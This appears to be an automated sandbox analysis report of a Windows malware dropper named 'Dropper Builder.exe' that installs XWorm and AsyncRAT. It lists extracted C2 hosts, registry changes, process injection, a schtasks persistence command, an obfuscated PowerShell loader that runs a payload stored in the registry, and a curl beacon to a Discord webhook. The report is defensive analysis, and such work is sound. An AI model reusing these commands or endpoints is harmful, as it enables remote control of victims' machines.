Analysis
-
max time kernel
149s
-
max time network
3s
-
platform
windows7_x64
-
resource
win7-20240220-en
-
resource tags
arch:x64 arch:x86 image:win7-20240220-en locale:en-us os:windows7-x64 system
-
submitted
22-06-2024 05:51
Static task
static1
Behavioral task
behavioral1
Sample
Dropper Builder.exe
Resource
win7-20240220-en
General
-
Target
Dropper Builder.exe
-
Size
18.6MB
-
MD5
c660fd4addbfaa81fac0a1f5d39cd000
-
SHA1
7d1aaa224037b1ade30bb951ee04989b73d71a81
-
SHA256
7e19aad8690328d389e5d037dd47c4fdcea7775ad69a0755c3e2eeba1df44ed8
-
SHA512
a53d1608adb02d2b7ad7109490e1dce4b073cf622a291b52cea8794ba3c0296248fa87fb8305893cfb65d44f500afc7057375368eff2fd0a2e872a6420e8d5c9
-
SSDEEP
98304:c+R1sVuWzOYBvDdXCxGSQjJQaoyqUIIdZicEMtECV:ckCzFvDdXCcSQLbqUISpEMW
Malware Config
Extracted
xworm
politics-fiber.gl.at.ply.gg:47430
-
Install_directory
%AppData%
-
install_file
$77-scchost.exe
Extracted
asyncrat
Default
environmental-blank.gl.at.ply.gg:25944
-
delay
1
-
install
true
-
install_file
$77-aachost.exe
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource | yara_rule
\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | family_xworm
behavioral1/memory/2640-11-0x0000000001170000-0x0000000001182000-memory.dmp | family_xworm
-
Modifies security service 2 TTPs 2 IoCs
Processes: svchost.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP | svchost.exe
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection | svchost.exe
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes: powershell.EXE
description | pid | process | target process
PID 2860 created 436 | 2860 | powershell.EXE | winlogon.exe
-
Async RAT payload 1 IoCs
Processes:
resource | yara_rule
\Users\Admin\AppData\Local\Temp\$77-aachost.exe | family_asyncrat
-
Executes dropped EXE 7 IoCs
Processes: $77-sdchost.exe, $77-aachost.exe, $77-penisballs.exe, $77-install.exe
pid | process
2640 | $77-sdchost.exe
2696 | $77-aachost.exe
2764 | $77-penisballs.exe
2680 | $77-install.exe
1556 | $77-aachost.exe
2600 | $77-sdchost.exe
2164 | $77-penisballs.exe
-
Loads dropped DLL 4 IoCs
Processes: Dropper Builder.exe
pid | process
2100 | Dropper Builder.exe  (4 times)
-
Drops file in System32 directory 3 IoCs
Processes: powershell.EXE, $77-penisballs.exe, $77-sdchost.exe
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf | $77-penisballs.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe | $77-sdchost.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.EXE
description | pid | process | target process
PID 2860 set thread context of 1452 | 2860 | powershell.EXE | dllhost.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 23 IoCs
Processes: dllhost.exe, $77-sdchost.exe, powershell.EXE, $77-aachost.exe, $77-penisballs.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | dllhost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 | dllhost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{0A88C858-7D0C-4549-9499-7DB05F0CB0BF} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 010000000000000030fb7e4768c4da01 | dllhost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1A0391BF-9564-4294-B0A4-06C298929EF9} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 010000000000000030fb7e4768c4da01 | dllhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | $77-sdchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | $77-sdchost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 1095054768c4da01 | powershell.EXE
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{85BBD920-42A0-1069-A2E4-08002B30309D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 | dllhost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 | dllhost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 | dllhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | dllhost.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.EXE
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000070387a4768c4da01 | dllhost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000070387a4768c4da01 | dllhost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 | dllhost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | dllhost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\ntshrui.dll,-103 = "S&hare with" | dllhost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | dllhost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{7B4A83B6-F704-4B77-8E3D-C6087E3A21D2} {BDDACB60-7657-47AE-8445-D23E1ACF82AE} 0xFFFF = 010000000000000030fb7e4768c4da01 | dllhost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | dllhost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | $77-aachost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | $77-penisballs.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | $77-sdchost.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes: powershell.EXE, dllhost.exe
pid | process
2860 | powershell.EXE  (2 times)
1452 | dllhost.exe  (6 times)
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes: $77-sdchost.exe, $77-penisballs.exe, powershell.EXE, dllhost.exe
description | pid | process
Token: SeDebugPrivilege | 2640 | $77-sdchost.exe
Token: SeDebugPrivilege | 2764 | $77-penisballs.exe
Token: SeDebugPrivilege | 2860 | powershell.EXE
Token: SeDebugPrivilege | 2860 | powershell.EXE
Token: SeDebugPrivilege | 1452 | dllhost.exe
Token: SeDebugPrivilege | 2600 | $77-sdchost.exe
Token: SeDebugPrivilege | 2164 | $77-penisballs.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: Dropper Builder.exe, taskeng.exe, powershell.EXE, dllhost.exe
description | pid | process | target process
PID 2100 wrote to memory of 2512 | 2100 | Dropper Builder.exe | cmd.exe  (4 times)
PID 2100 wrote to memory of 2640 | 2100 | Dropper Builder.exe | $77-sdchost.exe  (4 times)
PID 2100 wrote to memory of 2696 | 2100 | Dropper Builder.exe | $77-aachost.exe  (4 times)
PID 2100 wrote to memory of 2764 | 2100 | Dropper Builder.exe | $77-penisballs.exe  (4 times)
PID 2100 wrote to memory of 2680 | 2100 | Dropper Builder.exe | $77-install.exe  (7 times)
PID 2452 wrote to memory of 2860 | 2452 | taskeng.exe | powershell.EXE  (3 times)
PID 2860 wrote to memory of 1452 | 2860 | powershell.EXE | dllhost.exe  (9 times)
PID 1452 wrote to memory of 436 | 1452 | dllhost.exe | winlogon.exe
PID 1452 wrote to memory of 2600 | 1452 | dllhost.exe | $77-sdchost.exe  (3 times)
PID 1452 wrote to memory of 1556 | 1452 | dllhost.exe | $77-aachost.exe  (3 times)
PID 1452 wrote to memory of 2164 | 1452 | dllhost.exe | $77-penisballs.exe  (3 times)
PID 1452 wrote to memory of 480 | 1452 | dllhost.exe | services.exe
PID 1452 wrote to memory of 496 | 1452 | dllhost.exe | lsass.exe
PID 1452 wrote to memory of 504 | 1452 | dllhost.exe | lsm.exe
PID 1452 wrote to memory of 596 | 1452 | dllhost.exe | svchost.exe
PID 1452 wrote to memory of 676 | 1452 | dllhost.exe | svchost.exe
PID 1452 wrote to memory of 764 | 1452 | dllhost.exe | svchost.exe
PID 1452 wrote to memory of 808 | 1452 | dllhost.exe | svchost.exe
PID 1452 wrote to memory of 852 | 1452 | dllhost.exe | svchost.exe
PID 1452 wrote to memory of 964 | 1452 | dllhost.exe | svchost.exe
PID 1452 wrote to memory of 108 | 1452 | dllhost.exe | svchost.exe
PID 1452 wrote to memory of 1036 | 1452 | dllhost.exe | spoolsv.exe
PID 1452 wrote to memory of 1060 | 1452 | dllhost.exe | taskhost.exe
PID 1452 wrote to memory of 1116 | 1452 | dllhost.exe | svchost.exe
PID 1452 wrote to memory of 1152 | 1452 | dllhost.exe | Dwm.exe
PID 1452 wrote to memory of 1188 | 1452 | dllhost.exe | Explorer.EXE
PID 1452 wrote to memory of 3008 | 1452 | dllhost.exe | svchost.exe
PID 1452 wrote to memory of 1940 | 1452 | dllhost.exe | sppsvc.exe
PID 1452 wrote to memory of 2100 | 1452 | dllhost.exe | Dropper Builder.exe
PID 1452 wrote to memory of 2072 | 1452 | dllhost.exe | conhost.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(indented by tree depth; each entry lists the image path, then its command line, then the signatures hit by that process)
-
C:\Windows\system32\winlogon.exe  (depth 1)
  Command line: winlogon.exe
-
  C:\Windows\System32\dllhost.exe  (depth 2)
    Command line: C:\Windows\System32\dllhost.exe /Processid:{daab0e6c-6a8d-4eda-b12e-9f83114d2cb3}
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
-
    C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe  (depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
-
      C:\Windows\System32\schtasks.exe  (depth 4)
        Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
        - Scheduled Task/Job: Scheduled Task
-
    C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe  (depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
-
    C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe  (depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\services.exe  (depth 1)
  Command line: C:\Windows\system32\services.exe
-
  C:\Windows\system32\svchost.exe  (depth 2)
    Command line: C:\Windows\system32\svchost.exe -k DcomLaunch
-
  C:\Windows\system32\svchost.exe  (depth 2)
    Command line: C:\Windows\system32\svchost.exe -k RPCSS
-
  C:\Windows\System32\svchost.exe  (depth 2)
    Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
    - Modifies security service
-
  C:\Windows\System32\svchost.exe  (depth 2)
    Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
-
    C:\Windows\system32\Dwm.exe  (depth 3)
      Command line: "C:\Windows\system32\Dwm.exe"
-
  C:\Windows\system32\svchost.exe  (depth 2)
    Command line: C:\Windows\system32\svchost.exe -k netsvcs
-
    C:\Windows\system32\taskeng.exe  (depth 3)
      Command line: taskeng.exe {8BB70116-71DD-4957-97E3-AA92E9FF9BF5} S-1-5-18:NT AUTHORITY\System:Service:
      - Suspicious use of WriteProcessMemory
-
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (depth 4)
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+'7'+'s'+[Char](116)+''+[Char](97)+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Drops file in System32 directory
        - Suspicious use of SetThreadContext
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
-
  C:\Windows\system32\svchost.exe  (depth 2)
    Command line: C:\Windows\system32\svchost.exe -k LocalService
-
  C:\Windows\system32\svchost.exe  (depth 2)
    Command line: C:\Windows\system32\svchost.exe -k NetworkService
-
  C:\Windows\System32\spoolsv.exe  (depth 2)
    Command line: C:\Windows\System32\spoolsv.exe
-
  C:\Windows\system32\taskhost.exe  (depth 2)
    Command line: "taskhost.exe"
-
  C:\Windows\system32\svchost.exe  (depth 2)
    Command line: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
-
  C:\Windows\system32\svchost.exe  (depth 2)
    Command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
-
  C:\Windows\system32\sppsvc.exe  (depth 2)
    Command line: C:\Windows\system32\sppsvc.exe
-
C:\Windows\system32\lsass.exe  (depth 1)
  Command line: C:\Windows\system32\lsass.exe
-
C:\Windows\system32\lsm.exe  (depth 1)
  Command line: C:\Windows\system32\lsm.exe
-
C:\Windows\Explorer.EXE  (depth 1)
  Command line: C:\Windows\Explorer.EXE
-
  C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe  (depth 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
-
    C:\Windows\SysWOW64\cmd.exe  (depth 3)
      Command line: "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
-
    C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe  (depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe  (depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
      - Executes dropped EXE
-
    C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe  (depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Users\Admin\AppData\Local\Temp\$77-install.exe  (depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
      - Executes dropped EXE
-
C:\Windows\system32\conhost.exe  (depth 1)
  Command line: \??\C:\Windows\system32\conhost.exe "-15327495092059029896608600068-1704279424-499724045-312915142-1734203391-623858314"
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
\Users\Admin\AppData\Local\Temp\$77-aachost.exe
Filesize
66KB
MD5
f10712f4faa374be8f37668c5ebed4a6
SHA1
bb30e941c4f91ae3178539e993abecbfd838fdb0
SHA256
d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf
SHA512
cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac
-
\Users\Admin\AppData\Local\Temp\$77-install.exe
Filesize
163KB
MD5
1a7d1b5d24ba30c4d3d5502295ab5e89
SHA1
2d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256
b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512
859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
Filesize
256KB
MD5
18f497deffe88b6b2cff336a277aface
SHA1
4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA256
8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA512
35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
Filesize
50KB
MD5
77a71f3a441aa3bf824967e52413bec5
SHA1
c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
SHA256
1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
SHA512
31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b
-
memory/436-65-0x00000000373E0000-0x00000000373F0000-memory.dmp
Filesize
64KB
-
memory/436-57-0x0000000000420000-0x000000000044B000-memory.dmp
Filesize
172KB
-
memory/436-53-0x00000000003F0000-0x0000000000415000-memory.dmp
Filesize
148KB
-
memory/436-63-0x0000000000420000-0x000000000044B000-memory.dmp
Filesize
172KB
-
memory/436-64-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp
Filesize
64KB
-
memory/436-51-0x00000000003F0000-0x0000000000415000-memory.dmp
Filesize
148KB
-
memory/436-54-0x0000000000420000-0x000000000044B000-memory.dmp
Filesize
172KB
-
memory/480-78-0x0000000000CE0000-0x0000000000D0B000-memory.dmp
Filesize
172KB
-
memory/480-80-0x00000000373E0000-0x00000000373F0000-memory.dmp
Filesize
64KB
-
memory/480-79-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp
Filesize
64KB
-
memory/480-72-0x0000000000CE0000-0x0000000000D0B000-memory.dmp
Filesize
172KB
-
memory/496-86-0x0000000000990000-0x00000000009BB000-memory.dmp
Filesize
172KB
-
memory/496-92-0x0000000000990000-0x00000000009BB000-memory.dmp
Filesize
172KB
-
memory/496-93-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp
Filesize
64KB
-
memory/496-94-0x00000000373E0000-0x00000000373F0000-memory.dmp
Filesize
64KB
-
memory/504-100-0x0000000000480000-0x00000000004AB000-memory.dmp
Filesize
172KB
-
memory/1452-46-0x00000000773A0000-0x0000000077549000-memory.dmp
Filesize
1.7MB
-
memory/1452-43-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize
32KB
-
memory/1452-40-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize
32KB
-
memory/1452-42-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize
32KB
-
memory/1452-45-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize
32KB
-
memory/1452-48-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize
32KB
-
memory/1452-47-0x0000000077280000-0x000000007739F000-memory.dmp
Filesize
1.1MB
-
memory/1452-41-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize
32KB
-
memory/2100-0-0x00000000745AE000-0x00000000745AF000-memory.dmp
Filesize
4KB
-
memory/2100-1-0x0000000000E30000-0x00000000020D0000-memory.dmp
Filesize
18.6MB
-
memory/2640-11-0x0000000001170000-0x0000000001182000-memory.dmp
Filesize
72KB
-
memory/2696-19-0x0000000000F10000-0x0000000000F26000-memory.dmp
Filesize
88KB
-
memory/2764-33-0x00000000001C0000-0x00000000001C6000-memory.dmp
Filesize
24KB
-
memory/2764-27-0x0000000001030000-0x0000000001076000-memory.dmp
Filesize
280KB
-
memory/2860-39-0x0000000077280000-0x000000007739F000-memory.dmp
Filesize
1.1MB
-
memory/2860-35-0x0000000019FD0000-0x000000001A2B2000-memory.dmp
Filesize
2.9MB
-
memory/2860-36-0x0000000000DB0000-0x0000000000DB8000-memory.dmp
Filesize
32KB
-
memory/2860-37-0x0000000001540000-0x000000000156A000-memory.dmp
Filesize
168KB
-
memory/2860-38-0x00000000773A0000-0x0000000077549000-memory.dmp
Filesize
1.7MB